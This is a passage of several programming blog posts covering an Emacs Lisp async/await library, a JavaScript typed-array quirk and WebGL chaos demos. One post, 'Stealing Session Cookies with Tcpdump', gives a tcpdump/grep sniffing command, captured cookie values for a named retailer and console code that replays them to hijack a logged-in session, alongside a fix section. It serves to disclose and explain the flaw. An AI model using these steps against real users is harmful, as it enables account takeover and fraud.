The other half of the equation is resolving a promise, which is done with aio-resolve. Unlike other promises, aio promises don’t care whether the promise is being fulfilled (success) or rejected (error). Instead a promise is resolved using a value function — or, usually, a value closure. Subscribers receive this value function and extract the value by invoking it with no arguments.

Why? This lets the promise’s resolver decide the semantics of the result. Instead of returning a value, this function can instead signal an error, propagating an error signal that terminated an async function. Because of this, the promise doesn’t need to know how it’s being resolved.

When a promise is resolved, subscribers are each scheduled in their own event loop turns in the same order that they subscribed. If a promise has already been resolved, nothing happens. (Thought: Perhaps this should be an error in order to catch API misuse?)

(defun aio-resolve (promise value-function)
  (unless (aio-result promise)
    (let ((callbacks (nreverse (aref promise 2))))
      (setf (aref promise 1) value-function
            (aref promise 2) ())
      (dolist (callback callbacks)
        (run-at-time 0 nil callback value-function)))))

If you’re not an async function, you might subscribe to a promise like so:

(aio-listen promise (lambda (v)
                      (message "%s" (funcall v))))

The simplest example of a non-async function that creates and delivers on a promise is a “sleep” function:

(defun aio-sleep (seconds &optional result)
  (let ((promise (aio-promise))
        (value-function (lambda () result)))
    (prog1 promise
      (run-at-time seconds nil
                   #'aio-resolve promise value-function))))

Similarly, here’s a “timeout” promise that delivers a special timeout error signal at a given time in the future.

(defun aio-timeout (seconds)
  (let ((promise (aio-promise))
        (value-function (lambda () (signal 'aio-timeout nil))))
    (prog1 promise
      (run-at-time seconds nil
                   #'aio-resolve promise value-function))))

That’s all there is to promises.

Evaluate in the context of a promise

Before we get into pausing functions, let’s deal with the slightly simpler matter of delivering their return values using a promise. What we need is a way to evaluate a “body” and capture its result in a promise. If the body exits due to a signal, we want to capture that as well.

Here’s a macro that does just this:

(defmacro aio-with-promise (promise &rest body)
  `(aio-resolve ,promise
                (condition-case error
                    (let ((result (progn ,@body)))
                      (lambda () result))
                  (error (lambda ()
                           (signal (car error) ; rethrow
                                   (cdr error)))))))

The body result is captured in a closure and delivered to the promise. If there’s an error signal, it’s “rethrown” into subscribers by the promise’s value function.

This is where Emacs Lisp has a serious weak spot. There’s not really a concept of rethrowing a signal. Unlike a language with explicit exception objects that can capture a snapshot of the backtrace, the original backtrace is completely lost where the signal is caught. There’s no way to “reattach” it to the signal when it’s rethrown. This is unfortunate because it would greatly help debugging if you got to see the full backtrace on the other side of the promise.

Async functions

So we have promises and we want to pause a function on a promise. Generators have iter-yield for pausing an iterator’s execution. To tackle this problem:

Yield the promise to pause the iterator.
Subscribe a callback on the promise that continues the generator (iter-next) with the promise’s result as the yield result.

All the hard work is done on either side of the yield, so aio-await is just a simple wrapper around iter-yield:

(defmacro aio-await (expr)
  `(funcall (iter-yield ,expr)))

Remember that the funcall is there to extract the promise value from the value function. If it signals an error, this propagates directly into the iterator just as if it had been a direct call — minus an accurate backtrace.

So aio-lambda / aio-defun needs to wrap the body in a generator (iter-lambda), invoke it to produce an iterator, then drive the iterator using callbacks. Here’s a simplified, unhygienic definition of aio-lambda:

(defmacro aio-lambda (arglist &rest body)
  `(lambda (&rest args)
     (let ((promise (aio-promise))
           (iter (apply (iter-lambda ,arglist
                          (aio-with-promise promise
                            ,@body))
                        args)))
       (prog1 promise
         (aio--step iter promise nil)))))

The body is evaluated inside aio-with-promise with the result delivered to the promise returned directly by the async function.

Before returning, the iterator is handed to aio--step, which drives the iterator forward until it delivers its first promise. When the iterator yields a promise, aio--step attaches a callback back to itself on the promise as described above. Immediately driving the iterator up to the first yielded promise “primes” it, which is important for getting the ball rolling on any asynchronous operations.

If the iterator ever yields something other than a promise, it’s delivered right back into the iterator.

(defun aio--step (iter promise yield-result)
  (condition-case _
      (cl-loop for result = (iter-next iter yield-result)
               then (iter-next iter (lambda () result))
               until (aio-promise-p result)
               finally (aio-listen result
                                   (lambda (value)
                                     (aio--step iter promise value))))
    (iter-end-of-sequence)))

When the iterator is done, nothing more needs to happen since the iterator resolves its own return value promise.
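The same driving loop translates almost directly to JavaScript generators. Here’s a sketch of the general technique using native Promise objects, with rejection in place of value functions. The name run is invented for this example, and unlike aio--step it resolves the returned promise itself rather than leaving that to the generator body.

```javascript
// Drive a generator that yields promises, resuming it with each result.
function run(generatorFunction, ...args) {
    return new Promise((resolve, reject) => {
        const iter = generatorFunction(...args);

        // method is "next" to deliver a value or "throw" to deliver an error.
        function step(method, input) {
            let next;
            try {
                next = iter[method](input);
            } catch (e) {
                reject(e);             // the body exited with an error
                return;
            }
            if (next.done) {
                resolve(next.value);   // the body returned
            } else {
                // Subscribe a callback that continues the generator.
                Promise.resolve(next.value).then(
                    value => step("next", value),
                    error => step("throw", error));
            }
        }

        // "Prime" the generator: run it up to its first yield right away.
        step("next", undefined);
    });
}

// Usage: each yield plays the role of aio-await.
const sum = run(function* (a, b) {
    const x = yield Promise.resolve(a);
    const y = yield Promise.resolve(b);
    return x + y;
}, 1, 2);
```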

The definition of aio-defun just uses aio-lambda with defalias. There’s nothing to it.

That’s everything you need! Everything else in the package is merely useful, awaitable functions like aio-sleep and aio-timeout.

Composing promises

Unfortunately url-retrieve doesn’t support timeouts. We can work around this by composing two promises: a url-retrieve promise and an aio-timeout promise. First define a promise-returning function, aio-select, that takes a list of promises and returns (as another promise) the first promise to resolve:

(defun aio-select (promises)
  (let ((result (aio-promise)))
    (prog1 result
      (dolist (promise promises)
        (aio-listen promise (lambda (_)
                              (aio-resolve
                               result
                               (lambda () promise))))))))

We give aio-select both our url-retrieve and timeout promises, and it tells us which resolved first:

(aio-defun fetch-fortune-4 (url timeout)
  (let* ((promises (list (aio-url-retrieve url)
                         (aio-timeout timeout)))
         (fastest (aio-await (aio-select promises)))
         (buffer (aio-await fastest)))
    (with-current-buffer buffer
      (prog1 (buffer-string)
        (kill-buffer)))))

Cool! Note: This will not actually cancel the URL request, just move the async function forward earlier and prevent it from getting the result.

Threads

Despite aio being entirely about managing concurrent, asynchronous operations, it has nothing at all to do with threads — as in Emacs 26’s support for kernel threads. All async functions and promise callbacks are expected to run only on the main thread. That’s not to say an async function can’t await on a result from another thread. It just must be done very carefully.

Processes

The package also includes two functions for realizing promises on processes, whether they be subprocesses or network sockets.

aio-process-filter
aio-process-sentinel

For example, this function loops over each chunk of output (typically 4kB) from the process, as delivered to a filter function:

(aio-defun process-chunks (process)
  (cl-loop for chunk = (aio-await (aio-process-filter process))
           while chunk
           do (... process chunk ...)))

Exercise for the reader: Write an awaitable function that returns a line at a time rather than a chunk at a time. You can build it on top of aio-process-filter.

I considered wrapping functions like start-process so that their aio versions would return a promise representing some kind of result from the process. However there are so many different ways to create and configure processes that I would have ended up duplicating all the process functions. Focusing on the filter and sentinel, and letting the caller create and configure the process is much cleaner.

Unfortunately Emacs has no asynchronous API for writing output to a process. Both process-send-string and process-send-region will block if the pipe or socket is full. There is no callback, so you cannot await on writing output. Maybe there’s a way to do it with a dedicated thread?

Another issue is that the process-send-* functions are preemptible, made necessary because they block. The aio-process-* functions leave a gap (i.e. between filter awaits) where no filter or sentinel function is attached. It’s a consequence of promises being single-fire. The gap is harmless so long as the async function doesn’t await something else or get preempted. This needs some more thought.

Update: These process functions no longer exist and have been replaced by a small framework for building chains of promises. See aio-make-callback.

Testing aio

The test suite for aio is a bit unusual. Emacs’ built-in test suite, ERT, doesn’t support asynchronous tests. Furthermore, tests are generally run in batch mode, where Emacs invokes a single function and then exits rather than pump an event loop. Batch mode can only handle asynchronous process I/O, not the async functions of aio. So it’s not possible to run the tests in batch mode.

Instead I hacked together a really crude callback-based test suite. It runs in non-batch mode and writes the test results into a buffer (run with make check). Not ideal, but it works.

One of the tests is a sleep sort (with reasonable tolerances). It’s a pretty neat demonstration of what you can do with aio:

(aio-defun sleep-sort (values)
  (let ((promises (mapcar (lambda (v) (aio-sleep v v)) values)))
    (cl-loop while promises
             for next = (aio-await (aio-select promises))
             do (setf promises (delq next promises))
             collect (aio-await next))))

To see it in action (M-x sleep-sort-demo):

(aio-defun sleep-sort-demo ()
  (interactive)
  (let ((values '(0.1 0.4 1.1 0.2 0.8 0.6)))
    (message "%S" (aio-await (sleep-sort values)))))

Async/await is pretty awesome

I’m quite happy with how this all came together. Once I had the concepts straight — particularly resolving to value functions — everything made sense and all the parts fit together well, and mostly by accident. That feels good.

A JavaScript Typed Array Gotcha

2019-01-23T02:50:30Z

JavaScript’s prefix increment and decrement operators can be surprising when applied to typed arrays. It caught me by surprise when I was porting some C code over to JavaScript. Just using your brain to execute this code, what do you believe is the value of r?

let array = new Uint8Array([255]);
let r = ++array[0];

The increment and decrement operators originated in the B programming language. Its closest living relative today is C, and, as far as these operators are concerned, C can be considered an ancestor of JavaScript. So what is the value of r in this similar C code?

uint8_t array[] = {255};
int r = ++array[0];

Of course, if they were the same then there would be nothing to write about, so that should make it easier to guess if you aren’t sure. The answer: In JavaScript, r is 256. In C, r is 0.

What happened to me was that I wrote an 80-bit integer increment routine in C like this:

uint8_t array[10];
/* ... */
for (int i = 9; i >= 0; i--)
    if (++array[i])
        break;

But I was getting the wrong result over in JavaScript from essentially the same code:

let array = new Uint8Array(10);
/* ... */
for (let i = 9; i >= 0; i--)
    if (++array[i])
        break;

So what’s going on here?

JavaScript specification

The ES5 specification says this about the prefix increment operator:

Let expr be the result of evaluating UnaryExpression.

Throw a SyntaxError exception if the following conditions are all true: [omitted]

Let oldValue be ToNumber(GetValue(expr)).

Let newValue be the result of adding the value 1 to oldValue, using the same rules as for the + operator (see 11.6.3).

Call PutValue(expr, newValue).

Return newValue.

So, oldValue is 255. This is a double precision float because all numbers in JavaScript (outside of the bitwise operations) are double precision floating point. Add 1 to this value to get 256, which is newValue. When newValue is stored in the array via PutValue(), it’s converted to an unsigned 8-bit integer, which truncates it to 0.

However, newValue is returned, not the value that was actually stored in the array!
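The two values are easy to observe side by side. A minimal check, with variable names chosen just for this example:

```javascript
const bytes = new Uint8Array([255]);
const returned = ++bytes[0];

console.log(returned);   // 256: newValue, before any conversion
console.log(bytes[0]);   // 0: what PutValue() actually stored
```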

Since JavaScript is dynamically typed, this difference did not actually matter until typed arrays were introduced. I suspect if typed arrays had been in JavaScript from the beginning, the specified behavior would be more in line with C.

This behavior isn’t limited to the prefix operators. Consider assignment:

let array = new Uint8Array([255]);
let r = (array[0] = array[0] + 1);
let s = (array[0] += 1);

Both r and s will still be 256. The result of the assignment operators is a similar story:

LeftHandSideExpression = AssignmentExpression is evaluated as follows:

Let lref be the result of evaluating LeftHandSideExpression.

Let rref be the result of evaluating AssignmentExpression.

Let rval be GetValue(rref).

Throw a SyntaxError exception if the following conditions are all true: [omitted]

Call PutValue(lref, rval).

Return rval.

Again, the result of the expression is independent of how it was stored with PutValue().
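Given all this, one way to port the increment routine is to ignore the result of the expression and read the element back after it has been stored. A sketch, with incrementCounter as an illustrative name:

```javascript
// Increment a big-endian multi-byte counter in place.
function incrementCounter(array) {
    for (let i = array.length - 1; i >= 0; i--) {
        array[i]++;             // the expression's result is ignored
        if (array[i] !== 0)     // re-read the stored, wrapped value
            break;              // no carry into the next byte
    }
    return array;
}

const counter = new Uint8Array(10);
counter[9] = 255;
incrementCounter(counter);      // carries into counter[8]
```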

C specification

I’ll be referencing the original C89/C90 standard. The C specification requires a little more work to get to the bottom of the issue. Starting with 3.3.3.1 (Prefix increment and decrement operators):

The value of the operand of the prefix ++ operator is incremented. The result is the new value of the operand after incrementation. The expression ++E is equivalent to (E+=1).

Later in 3.3.16.2 (Compound assignment):

A compound assignment of the form E1 op = E2 differs from the simple assignment expression E1 = E1 op (E2) only in that the lvalue E1 is evaluated only once.

Then finally in 3.3.16 (Assignment operators):

An assignment operator stores a value in the object designated by the left operand. An assignment expression has the value of the left operand after the assignment, but is not an lvalue.

So the result is explicitly the value after assignment. Let’s look at this step by step after rewriting the expression.

int r = (array[0] = array[0] + 1);

In C, all integer operations are performed with at least int precision. Smaller integers are implicitly promoted to int before the operation. The value of array[0] is 255, and, since uint8_t is smaller than int, it gets promoted to int. Additionally, the literal constant 1 is also an int, so there are actually two reasons for this promotion.

So since these are int values, the result of the addition is 256, like in JavaScript. To store the result, this value is then demoted to uint8_t and truncated to 0. Finally, this post-assignment 0 is the result of the expression, not the right-hand result as in JavaScript.

Specifications are useful

These situations are why I prefer programming languages that have a formal and approachable specification. If there’s no specification and I’m observing undocumented, idiosyncratic behavior, is this just some subtle quirk of the current implementation — e.g. something that might change without notice in the future — or is it intended behavior that I can rely upon for correctness?

Two Chaotic Motion Demos

2018-02-15T04:18:07Z

I’ve put together two online, interactive, demonstrations of chaotic motion. One is 2D and the other is 3D, but both are rendered using WebGL — which, for me, is the most interesting part. Both are governed by ordinary differential equations. Both are integrated using the Runge–Kutta method, specifically RK4.

Far more knowledgeable people have already written introductions for chaos theory, so here’s just a quick summary. A chaotic system is deterministic but highly sensitive to initial conditions. Tweaking a single bit of the starting state of either of my demos will quickly lead to two arbitrarily different results. Both demonstrations have features that aim to show this in action.

This ain’t my first chaotic system rodeo. About eight years ago I made a water wheel Java applet, and that was based on some Matlab code I collaborated on some eleven years ago. I really hope you’re not equipped to run a crusty old Java applet in 2018, though. (Update: now upgraded to HTML5 Canvas.)

If you want to find either of these demos again in the future, you don’t need to find this article first. They’re both listed in my Showcase page, linked from the header of this site.

Double pendulum

First up is the classic double pendulum. This one’s more intuitive than my other demo since it’s modeling a physical system you could actually build and observe in the real world.

Source: https://github.com/skeeto/double-pendulum

I lifted the differential equations straight from the Wikipedia article (derivative() in my code). Same for the Runge–Kutta method (rk4() in my code). It’s all pretty straightforward. RK4 may not have been the best choice for this system since it seems to bleed off energy over time. If you let my demo run overnight, by morning there will obviously be a lot less activity.
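For reference, a single RK4 step has roughly the following shape. This is a generic sketch rather than the rk4() from the demo: the signature and the array-based state are assumptions, it makes no attempt to avoid allocation, and a simple harmonic oscillator stands in for the pendulum equations.

```javascript
// One RK4 step for y' = f(t, y), where y is an array of numbers.
function rk4(f, t, y, h) {
    // a + s * b, element by element
    const add = (a, b, s) => a.map((v, i) => v + s * b[i]);
    const k1 = f(t, y);
    const k2 = f(t + h / 2, add(y, k1, h / 2));
    const k3 = f(t + h / 2, add(y, k2, h / 2));
    const k4 = f(t + h, add(y, k3, h));
    return y.map((v, i) =>
        v + h / 6 * (k1[i] + 2 * k2[i] + 2 * k3[i] + k4[i]));
}

// Example: simple harmonic oscillator, state = [position, velocity].
const oscillator = (t, [x, v]) => [v, -x];
let state = [1, 0];
const steps = 1000, h = 2 * Math.PI / steps;
for (let i = 0; i < steps; i++)
    state = rk4(oscillator, i * h, state, h);
// After one full period the state is back near [1, 0].
```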

I’m not a fan of buttons and other fancy GUI widgets — neither designing them nor using them myself — preferring more cryptic, but easy-to-use keyboard-driven interfaces. (Hey, it works well for mpv and MPlayer.) I haven’t bothered with a mobile interface, so sorry if you’re reading on your phone. You’ll just have to enjoy watching a single pendulum.

Here are the controls:

a: add a new random pendulum
c: imperfectly clone an existing pendulum
d: delete the most recently added pendulum
m: toggle between WebGL and Canvas rendering
SPACE: pause the simulation (toggle)

To witness chaos theory in action:

Start with a single pendulum (the default).
Pause the simulation (SPACE).
Make a dozen or so clones (press c for a while).
Unpause.

At first it will appear as a single pendulum, but they’re actually all stacked up, each starting from slightly randomized initial conditions. Within a minute you’ll witness the pendulums diverge, and after a minute they’ll all be completely different. It’s pretty to watch them come apart at first.

It might appear that the m key doesn’t actually do anything. That’s because the HTML5 Canvas rendering — which is what I actually implemented first — is really close to the WebGL rendering. I’m really proud of this. There are just three noticeable differences. First, there’s a rounded line cap in the Canvas rendering where the pendulum is “attached.” Second, the tail line segments aren’t properly connected in the Canvas rendering. The segments are stroked separately in order to get that gradient effect along its path. Third, it’s a lot slower, particularly when there are many pendulums to render.

In WebGL the two “masses” are rendered using that handy old circle rasterization technique on a quad. Either a triangle fan or pre-rendering the circle as a texture would probably have been a better choice. The two bars are the same quad buffers, just squeezed and rotated into place. Both were really simple to create. It’s the tail that was tricky to render.

When I wrote the original Canvas renderer, I set the super convenient lineWidth property to get a nice, thick tail. In my first cut at rendering the tail I used GL_LINE_STRIP to draw a line primitive. The problem with the line primitive is that an OpenGL implementation is only required to support single pixel wide lines. If I wanted wider, I’d have to generate the geometry myself. So I did.
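To give a sense of what generating that geometry involves, here’s a rough sketch of expanding a line strip into triangle strip vertices with miter joins. It’s a generic construction with made-up names (thickLine, miterLimit), not a copy of polyline(), and it allocates freely for the sake of brevity.

```javascript
// Expand a 2D line strip into triangle-strip vertices using miter joins.
// points: flat array [x0, y0, x1, y1, ...], at least two points, with no
// two consecutive points equal.
// Returns a flat Float32Array with two vertices per input point.
function thickLine(points, width, miterLimit) {
    const n = points.length / 2;
    const half = width / 2;
    const out = new Float32Array(n * 4);

    // Unit normal of the segment from point a to point b.
    function normal(a, b) {
        const dx = points[b * 2] - points[a * 2];
        const dy = points[b * 2 + 1] - points[a * 2 + 1];
        const len = Math.hypot(dx, dy);
        return [-dy / len, dx / len];
    }

    for (let i = 0; i < n; i++) {
        // End points have only one adjacent segment, used for both normals.
        const [ax, ay] = normal(Math.max(i - 1, 0), Math.max(i, 1));
        const [bx, by] = normal(Math.min(i, n - 2), Math.min(i + 1, n - 1));

        // The miter direction bisects the two segment normals.
        let mx = ax + bx, my = ay + by;
        const mlen = Math.hypot(mx, my);
        if (mlen < 1e-6) {      // the path doubles back on itself
            mx = bx; my = by;
        } else {
            mx /= mlen; my /= mlen;
        }

        // Stretch the miter so the strip keeps its width through the
        // corner, but never by more than miterLimit.
        const cos = mx * bx + my * by;
        const scale = half * Math.min(1 / cos, miterLimit);

        const x = points[i * 2], y = points[i * 2 + 1];
        out[i * 4 + 0] = x + mx * scale;
        out[i * 4 + 1] = y + my * scale;
        out[i * 4 + 2] = x - mx * scale;
        out[i * 4 + 3] = y - my * scale;
    }
    return out;
}
```

The output is ordered so that it can be drawn directly as a triangle strip. Without the limit, the miter length grows without bound as a turn approaches a full reversal.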

Like before, I wasn’t about to dirty my hands manipulating a graphite-filled wooden stick on a piece of paper to solve this problem. No, I lifted the math from something I found on the internet again. In this case it was a forum post by paul.houx, which provides a few vector equations to compute a triangle strip from a line strip. My own modification was to add a miter limit, which keeps sharp turns under control. You can find my implementation in polyline() in my code. Here’s a close-up with the skeleton rendered on top in black:

For the first time I’m also using ECMAScript’s new template literals to store the shaders inside the JavaScript source. These string literals can contain newlines, but, even cooler, they do string interpolation, meaning I can embed JavaScript variables directly into the shader code:

let massRadius = 0.12;
let vertexShader = `
attribute vec2 a_point;
uniform   vec2 u_center;
varying   vec2 v_point;

void main() {
    v_point = a_point;
    gl_Position = vec4(a_point * ${massRadius} + u_center, 0, 1);
}`;

Allocation avoidance

If you’ve looked at my code you might have noticed something curious. I’m using a lot of destructuring assignments, which is another relatively new addition to ECMAScript. This was part of a little experiment.

function normalize(v0, v1) {
    let d = Math.sqrt(v0 * v0 + v1 * v1);
    return [v0 / d, v1 / d];
}

/* ... */

let [nx, ny] = normalize(-ly, lx);

One of my goals for this project was zero heap allocations in the main WebGL rendering loop. There are no garbage collector hiccups if there’s no garbage to collect. This sort of thing is trivial in a language with manual memory management, such as C and C++. Just having value semantics for aggregates would be sufficient.

But with JavaScript I don’t get to choose how my objects are allocated. One option is to pre-allocate everything, including space for all the intermediate values (e.g. an object pool), which would be clunky and unconventional. The other is to structure and access my allocations in such a way that the JIT compiler can eliminate them (via escape analysis, scalar replacement, etc.).

In this case, I’m trusting that JavaScript implementations will flatten these destructuring assignments so that the intermediate array never actually exists. It’s like pretending the array has value semantics. This seems to work as I expect with V8, but not so well with SpiderMonkey (yet?), at least in Firefox 52 ESR.
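For comparison, the pre-allocation alternative might look something like the following sketch. The out-parameter convention and the names normalizeInto and scratch are illustrative, not taken from the demo.

```javascript
// Scratch storage allocated once, outside the render loop.
const scratch = new Float64Array(2);

// Write the normalized vector into `out` instead of returning a new array.
function normalizeInto(out, v0, v1) {
    const d = Math.sqrt(v0 * v0 + v1 * v1);
    out[0] = v0 / d;
    out[1] = v1 / d;
    return out;
}

// Inside the loop: no array is created per call.
normalizeInto(scratch, 3, 4);
const nx = scratch[0], ny = scratch[1];
```

It gets the job done regardless of how clever the JIT compiler is, at the cost of threading scratch buffers through every call.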

Single precision

I briefly considered using Math.fround() to convince JavaScript to compute all the tail geometry in single precision. The double pendulum system would remain double precision, but the geometry doesn’t need all that precision. It’s all rounded to single precision going out to the GPU anyway.

Normally when pulling values from a Float32Array, they’re cast to double precision — JavaScript’s only numeric type — and all operations are performed in double precision, even if the result is stored back in a Float32Array. This is because the JIT compiler is required to correctly perform all the intermediate rounding. To relax this requirement, surround each operation with a call to Math.fround(). Since the result of doing each operation in double precision with this rounding step in between is equivalent to doing each operation in single precision, the JIT compiler can choose to do the latter.

let x = new Float32Array(n);
let y = new Float32Array(n);
let d = new Float32Array(n);
// ...
for (let i = 0; i < n; i++) {
    let xprod = Math.fround(x[i] * x[i]);
    let yprod = Math.fround(y[i] * y[i]);
    d[i] = Math.sqrt(Math.fround(xprod + yprod));
}

I ultimately decided not to bother with this since it would significantly obscure my code for what is probably a minuscule performance gain (in this case). It’s also really difficult to tell if I did it all correctly. So I figure this is better suited for compilers that target JavaScript rather than something to do by hand.

Lorenz system

The other demo is a Lorenz system with its famous butterfly pattern. I actually wrote this one a year and a half ago but never got around to writing about it. You can tell it’s older because I’m still using var.

Source: https://github.com/skeeto/lorenz-webgl

Like before, the equations came straight from the Wikipedia article (Lorenz.lorenz() in my code). The math is a lot simpler this time, too.
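To show just how simple, here are the three equations as a standalone sketch. The function and constant names are chosen for this example rather than copied from the demo, and the parameter values are the classic ones usually quoted for the butterfly, which I’m assuming here.

```javascript
// Classic Lorenz parameters (assumed for this example).
const SIGMA = 10, RHO = 28, BETA = 8 / 3;

// Time derivative of the state [x, y, z].
function lorenzDerivative([x, y, z]) {
    return [
        SIGMA * (y - x),
        x * (RHO - z) - y,
        x * y - BETA * z
    ];
}

const slope = lorenzDerivative([1, 1, 1]);   // [0, 26, 1 - 8/3]
```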

This one’s a bit more user friendly with a side menu displaying all your options. The keys are basically the same. This was completely by accident, I swear. Here are the important ones:

a: add a new random solution
c: clone a solution with a perturbation
C: remove all solutions
SPACE: toggle pause/unpause
You can click, drag, and toss it to examine it in 3D

Witnessing chaos theory in action is the same process as before: clear it down to a single solution (C then a), then add a bunch of randomized clones (c).

There is no Canvas renderer for this one. It’s pure WebGL. The tails are drawn using GL_LINE_STRIP, but in this case it works fine that they’re a single pixel wide. If heads are turned on, those are just GL_POINTS. The geometry is threadbare for this one.

There is one notable feature: The tails are stored exclusively in GPU memory. Only the “head” is stored CPU-side. After it computes the next step, it updates a single spot of the tail with glBufferSubData(), and the VBO is actually a circular buffer. OpenGL doesn’t directly support rendering from circular buffers, but it does have element arrays. An element array is an additional buffer of indices that tells OpenGL what order to use the elements in the other buffers.

Naively, this would mean that for a tail of 4 segments I need 4 different element arrays, one for each possible rotation:

array 0: 0 1 2 3
array 1: 1 2 3 0
array 2: 2 3 0 1
array 3: 3 0 1 2

With the knowledge that element arrays can start at an offset, and with a little cleverness, you might notice these can all overlap in a single, 7-element array:

0 1 2 3 0 1 2

Array 0 is at offset 0, array 1 is at offset 1, array 2 is at offset 2, and array 3 is at offset 3. The tails in the Lorenz system are drawn using drawElements() with exactly this sort of array.
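Building such an array for any tail length takes only a few lines. A sketch, where circularIndices is a name invented for this example:

```javascript
// Build the overlapped index array for a circular buffer of n elements.
// It has 2n - 1 entries: 0, 1, ..., n-1, 0, 1, ..., n-2.
function circularIndices(n) {
    const indices = new Uint16Array(2 * n - 1);
    for (let i = 0; i < indices.length; i++)
        indices[i] = i % n;
    return indices;
}

const indices = circularIndices(4);            // 0 1 2 3 0 1 2
const rotation2 = indices.subarray(2, 2 + 4);  // 2 3 0 1

// With WebGL, rotation k is selected by the offset passed to
// drawElements(). That offset is in bytes, so for 16-bit indices
// it is k * 2.
```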

Like before, I was very careful to produce zero heap allocations in the main loop. The FPS counter generates some garbage in the DOM due to reflow, but this goes away if you hide the help menu (?). This was long enough ago that destructuring assignment wasn’t available, but the Lorenz system and rendering it were so simple that using pre-allocated objects worked fine.

Beyond just the programming, I’ve gotten hours of entertainment playing with each of these systems. This was also the first time I’ve used WebGL in over a year, and this project was a reminder of just how pleasurable working with it is. The specification is superbly written and serves perfectly as its own reference.

Stealing Session Cookies with Tcpdump

2016-06-23T21:55:24Z

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer gets this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst and dst port). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "JSESSIONID=99004F61A4ED162641DC36046A" +
                  "C81EAB.prd_rrs12";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";
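The massaging itself is mechanical enough to automate. Here’s a sketch of a helper, with a name I made up for this example, that splits a captured header line (unwrapped back onto a single line) into the individual name=value strings:

```javascript
// Turn a captured "Cookie: a=1; b=2" header line into name=value
// strings, one per cookie.
function splitCookieHeader(line) {
    return line
        .replace(/^Cookie:\s*/, "")        // drop the header name
        .split(/;\s*/)                     // one entry per cookie
        .filter(pair => pair.length > 0);  // ignore a trailing ";"
}

const pairs = splitCookieHeader("Cookie: visitSource=Registered; wpCart=0; _cybskt=");
// pairs: ["visitSource=Registered", "wpCart=0", "_cybskt="]

// In the browser's developer console, each one is then assigned in turn:
//   for (const pair of pairs) document.cookie = pair;
```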

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can check out and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. The downside is that, with the Secure flag set, customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.
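As an illustration of the cookie flags, here’s a sketch of a helper that appends them to a Set-Cookie header value when they’re missing. The helper name is hypothetical and where it would hook into a real server is left open; Secure and HttpOnly are the standard attribute names.

```javascript
// Append the Secure and HttpOnly attributes to a Set-Cookie header
// value unless they are already present (attribute names are
// case-insensitive).
function hardenSetCookie(value) {
    let result = value.replace(/;\s*$/, "");   // drop a trailing ";"
    for (const flag of ["Secure", "HttpOnly"]) {
        const present = new RegExp(`;\\s*${flag}\\s*(;|$)`, "i").test(result);
        if (!present)
            result += `; ${flag}`;
    }
    return result;
}

const hardened = hardenSetCookie("JSESSIONID=abc123; Path=/");
// hardened: "JSESSIONID=abc123; Path=/; Secure; HttpOnly"
```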

A GPU Approach to Particle Physics

2014-06-29T03:23:42Z

The next project in my GPGPU series is a particle physics engine that computes the entire physics simulation on the GPU. Particles are influenced by gravity and will bounce off scene geometry. This WebGL demo uses a shader feature not strictly required by the OpenGL ES 2.0 specification, so it may not work on some platforms, especially mobile devices. It will be discussed later in the article.

https://skeeto.github.io/webgl-particles/ (source)

It’s interactive. The mouse cursor is a circular obstacle that the particles bounce off of, and clicking will place a permanent obstacle in the simulation. You can paint and draw structures through which the particles will flow.

Here’s an HTML5 video of the demo in action, which, out of necessity, is recorded at 60 frames-per-second and a high bitrate, so it’s pretty big. Video codecs don’t gracefully handle all these full-screen particles, and lower framerates really don’t capture the effect properly. I also added some appropriate sound that you won’t hear in the actual demo.

